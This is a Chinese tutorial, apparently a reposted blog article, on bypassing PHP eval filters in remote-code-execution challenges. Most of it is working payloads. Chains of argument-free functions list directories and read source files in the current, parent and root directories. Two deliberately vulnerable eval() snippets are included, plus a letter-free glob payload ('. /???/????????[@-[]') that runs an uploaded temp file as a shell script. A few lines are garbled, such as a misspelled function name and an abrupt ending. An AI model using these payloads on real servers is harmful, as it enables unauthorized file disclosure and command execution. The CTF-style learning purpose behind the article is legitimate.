如何理解php rce中无参数读文件,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。
就是使用函数的时候不能带有参数。
可以是a()、a(b())或a(b(c())),但不能是a('b')或a('b','c'),不能带参数
所以我们要使用无参数的函数进行文件读取或者命令执行。
查看当前目录文件名
通常,可以使用 print_r(scandir('.'))
查看当前目录下所有文件,以数组的形式输出。
但是要怎么构造参数里这个点呢。
localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是 .
https://www.w3school.com.cn/php/func_string_localeconv.asp
current() 返回数组中的单元,默认第一个值。
所以我们输出 print_r(scandir(current(localeconv())));
也会如同 print_r(scandir('.'))
打印当前目录下文件名。
使用 print_r(scandir(pos(localeconv())));
,pos是current的别名
reset()
函数将内部指针指向数组中的第一个元素,并输出。
相关的方法:
所以我们现在要构造 reset()
的参数。
chr(46)
就是字符 .
.所以我们需要构造 46 .
chr(rand()) # 需要看运气。。。不现实 char(time()) char(current(localtime(time())))
[tm_sec] - 秒数
[tm_min] - 分钟数
[tm_hour] - 小时
[tm_mday] - 月份中的第几天
[tm_mon] - 年份中的第几个月,从 0 开始表示一月份
[tm_year] - 年份,从 1900 开始
[tm_wday] - 星期中的第几天 (Sunday=0)
[tm_yday] - 年中的第几天
[tm_isdst] - 夏令时当前是否生效
chr(time())
chr() 函数以256为一个周期,所以 chr(46)
、chr(302)
、chr(558)
等都等于 .
所以使用chr(time()) 一个周期必能出现一次。
chr(current(localtime(time())))
localtime()
以数值数组和关联数组的形式输出本地时间:
关联数组的键名如下:
数组第一个值每秒加 1 ,所以最多 60 秒之内就可以得到 46 .然后用 current()
函数即可获得 第一位键值。再利用 chr() 函数就可以完美获得 .
current()- 返回数组中的当前元素的值
end()- 将内部指针指向数组中的最后一个元素,并输出
next()- 将内部指针指向数组中的下一个元素,并输出
prev()- 将内部指针指向数组中的上一个元素,并输出
each()- 返回当前元素的键名和键值,并将内部指针向前移动
phpversion()
返回 PHP 版本,例如 5.4.45
floor(phpversion()) 返回 5
sqrt(floor(phpversion())) 返回 2.2360679774998
tan(floor(sqrt(floor(phpversion()))))返回-2.1850398632615
cosh(tan(floor(sqrt(floor(phpversion())))))返回4.5017381103491
sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))返回45.081318677156
ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion())))))))返回46
chr(ceil(sinh(cosh(tan(floor(sqrt(floor(phpversion()))))))))返回"."
crypt()
返回使用 DES、Blowfish 或 MD5 算法加密的字符串。
hebrevc() 函数把希伯来文本从右至左的流转换为左至右的流。同时,把新行(\n)转换为
hebrevc(crypt(arg))可以随机生成一个hash值,第一个字符随机是$(大概率) 或者 "."(小概率) 然后通过chr(ord())只取第一个字符/
ord()返回字符串中第一个字符的Ascii值
print_r(scandir(chr(ord(hebrevc(crypt(time()))))));
多试几次。
strrev(crypt(serialize(array())))
也可以得到".",只不过crypt(serialize(array()))
的点出现在最后一个字符,需要使用strrev()
逆序,然后使用chr(ord())获取第一个字符.
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));
绝对路径
正常的,我们还可以用print_r(scandir('绝对路径'));来查看当前目录文件名。
获取绝对路径可用的有getcwd()
和realpath('.')
所以我们还可以用print_r(scandir(getcwd()));
输出当前文件夹所有文件名.
读取当前目录文件
通过前面的方法输出了当前目录文件名,如果文件不能直接显示,比如PHP源码,我们还需要使用函数读取:
前面的方法输出的是数组,文件名是数组的值,那我们要怎么取出想要读取文件的数组呢:
如果要获取最后一个文件内容,我们可以:
show_source(end(scandir(getcwd())));
# 或者使用其他函数
readfile
highlight_file
file_get_contents
readgzfile() # 也可读文件,常用于绕过过滤
报错 Strict Standards: Only variables should be passed by reference in
原因:PHP5.3以上默认只能传递具体的变量,而不能通过函数返回值传递,没有关系不影响我们读文件。
array_reverse() 以相反的元素顺序返回数组
本来在最后一位的文件可以反过来放第一位读取。
show_source(current(array_reverse(scandir(getcwd()))));
如果是倒数第二个我们可以用:
readfile(next(array_reverse(scandir(getcwd()))));
我想着还可以继续用 next()
结果不行。
那么如何读取其他文件
我们可以使用array_rand(array_flip()),array_flip()是交换数组的键和值,array_rand()是随机返回一个数组。
readfile(array_rand(array_flip(scandir(getcwd()))));
readfile(array_rand(array_flip(scandir(current(localeconve())))));
如果目标文件不在当前目录呢?
dirname() :返回路径中的目录部分,
从图中可以看出,如果传入的值是绝对路径(不包含文件名),则返回的是上一层路径,传入的是文件名绝对路径则返回文件的当前路径
chdir() :改变当前工作目录
print_r(scandir(dirname(getcwd()))); //查看上一级目录的文件
构造".."
print_r(next(scandir(getcwd())));:我们scandir(getcwd())出现的数组第二个就是"..",所以可以用next()获取
print_r(scandir(next(scandir(getcwd()))));//也可查看上级目录文件
结合上文的一些构造都是可以获得".."的 :
next(scandir(chr(ord(hebrevc(crypt(time()))))))
读取上级目录文件
直接 print_r(readfile(array_rand(array_flip(scandir(dirname(getcwd()))))));
是不可以的,会报错,因为默认是在当前工作目录寻找并读取这个文件,而这个文件在上一层目录,所以要先改变当前工作目录,前面写到了chdir(),使用:
show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
如果不能使用dirname(),可以使用构造".."的方式切换路径并读取:
但是这里切换路径后getcwd()和localeconv()不能接收参数,因为语法不允许,我们可以用之前的hebrevc(crypt(arg))
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd())))))))))));
或更复杂的:
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion())))))))))))))));
还可以用:
show_source(array_rand(array_flip(scandir(chr(current(localtime(time(chdir(next(scandir(current(localeconv()))))))))))));//这个得爆破,不然手动要刷新很久,如果文件是正数或倒数第一个第二个最好不过了,直接定位
还有:
if(chdir(next(scandir(getcwd()))))show_source(array_rand(array_flip(scandir(getcwd()))));
查看和读取根目录文件
print_r(scandir(chr(ord(strrev(crypt(serialize(array())))))));
strrev(crypt(serialize(array())))所获得的字符串第一位有几率是/,所以使用以上payload可以查看根目录文件.
但是有权限限制,linux系统下需要一定的权限才能读到,所以不一定成功.
if(chdir(chr(ord(strrev(crypt(serialize(array())))))))print_r(scandir(getcwd()));
if(chdir(chr(ord(strrev(crypt(serialize(array())))))))show_source(array_rand(array_flip(scandir(getcwd()))));
array_flip() 函数用于反转/交换数组中的键名和对应关联的键值。
array_rand() 函数返回数组中的随机键名,或者如果您规定函数返回不只一个键名,则返回包含随机键名的数组。
end()- 将数组的内部指针指向最后一个单元
key()- 从关联数组中取得键名
each()- 返回数组中当前的键/值对并将数组指针向前移动一步
prev()- 将数组的内部指针倒回一位
reset()- 将数组的内部指针指向第一个单元
next()- 将数组中的内部指针向前移动一位
<?php
if(isset($_GET['code'])){
$code=$_GET['code'];
if(strlen($code)>35){
die("Long.");
}
if(preg_match("/[A-Za-z0-9_$]+/",$code)){
die("NO.");
}
eval($code);
}else{
highlight_file(__FILE__);
}
因为$
不能使用了,所以我们无法构造PHP中的变量。
如何利用无字母、数字、$
的系统命令来getshell?
shell下可以利用.
来执行任意脚本
Linux文件名支持用glob通配符代替
.
或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。比如,当前运行的shell是bash,则. file
的意思就是用bash执行file文件中的命令。
用. file
执行文件,是不需要file有x权限的。那么,如果目标服务器上有一个我们可控的文件,那不就可以利用.
来执行它了吗?
这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX
,文件名最后6个字符是随机的大小写字母。
第二个难题接踵而至,执行. /tmp/phpXXXXXX
,也是有字母的。此时就可以用到Linux下的glob通配符:
*
可以代替0个及以上任意字符
?
可以代表1个任意字符
那么,/tmp/phpXXXXXX
就可以表示为/*/?????????
或/???/?????????
。
能够匹配上/???/?????????
这个通配符的文件有很多.
大部分同学对于通配符,可能知道的都只有*
和?
.
其中,glob支持用[^x]
的方法来构造“这个位置不是字符x”。那么,我们用这个姿势干掉一些干扰选项。
就跟正则表达式类似,glob支持利用[0-9]
来表示一个范围。
所有文件名都是小写,只有PHP生成的临时文件包含大写字母。那么答案就呼之欲出了,我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。
翻开ascii码表,可见大写字母位于@
与[
之间:
那么,我们可以利用[@-[]
来表示大写字母:
构造 poc ,执行任意命令。
当然,php生成临时文件名是随机的,最后一个字符不一定是大写字母,不过多尝试几次也就行了。
最后,我传入的code为?c=. /???/????????[@-[]
,发送数据包如下:
#!/bin/sh ls
我们可以使用无参数函数任意读文件,也可以执行命令。
<?php
if(';'===preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {
eval($_GET['code']);
} else{
show_source(__FILE__);
}
我们传入一个参数,然后经过正则替换后剩余 分号 ;
方可执行我们的payload.
代码非常清晰,首先
preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])
代码会将$_GET['code']中满足正则/\W+((?R)?)/的部分,替换为空,然后查看是否剩下的部分强等于;如果满足,则执行
eval($_GET['code']);
否则什么都不做。那么思路很明确,我们弄清楚正则即可进行RCE
[^\W]+\((?R)?\)
首先是[^\W]
对于\W,其意思等价于[^A-Za-z0-9_]
。那么我们知道,我们的input必须以此开头然后是括号匹配
\( ...... \)
括号中间为
(?R)?
意思为重复整个模式简单理解,我们可以输入以下类型
a(b(c()))
但我们不能加参数,否则将无法匹配,正则替换掉其他之后,甚于的不是只有分号,所以不强等于 左边的;
a(c,d)
所以正则看完,题目的意思非常明确了:我们只能input函数,但函数中不能使用参数,否则判断句右边经过替换,将不止剩余分号;。
既然传入的code值不能含有参数,那我们可不可以把参数放在别的地方,code用无参数函数来接收参数呢?这样就可以打破无参数函数的限制:
查阅php手册,有非常多的超全局变量
$GLOBALS
$_SERVER
$_GET
$_POST
$_FILES
$_COOKIE
$_SESSION
$_REQUEST
$_ENV
我们可以使用$_ENV
,对应函数为getenv()
getenv — 获取一个环境变量的值
首先想到headers,因为headers我们用户可控,于是在PHP手册中搜索:headers。
看完上述内容,你们掌握如何理解php rce中无参数读文件的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注亿速云行业资讯频道,感谢各位的阅读!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。